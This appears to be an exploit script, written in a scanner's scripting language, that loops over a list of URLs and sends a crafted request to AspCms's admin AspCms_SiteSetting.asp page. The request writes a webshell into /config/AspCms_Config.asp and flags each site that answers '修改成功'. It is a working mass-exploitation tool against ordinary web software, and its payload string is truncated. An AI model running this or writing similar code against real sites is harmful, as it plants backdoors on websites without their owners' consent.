#request urls = array
#define find = 200 OK
#define payload = /admin_aspcms/_system/AspCms_SiteSetting.asp?action=saves”, 1, “runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC

function judge(web)
{
	r = HttpGet(web.payload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
	if(StrFindStr(r[1],find,0)!= "-1")
	{
		return 1;
	}else
	{
		return 2;
	}

}

function main(args)
{
	printclolor("当前正在检测:"."AspCms_SiteSetting_getshell",1);
	i = 0;
	num = GetArrayNum(urls);
	while(i<num){
		url = urls[i];
		try{
			if(judge(url."/admin_aspcms/_system/AspCms_SiteSetting.asp") == 1)
			{
				res = HttpGet(url.payload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
				if(StrFindStr(res[0],"修改成功",0)!= "-1")
				{
					printclolor("[+]".urls[i]."存在AspCms_SiteSetting_getshell：/config/AspCms_Config.asp,访问".url."/config/AspCms_Config.asp",3);
				}
			}
		}catch{
		}
		i = ToInt(i+1);
	}
}
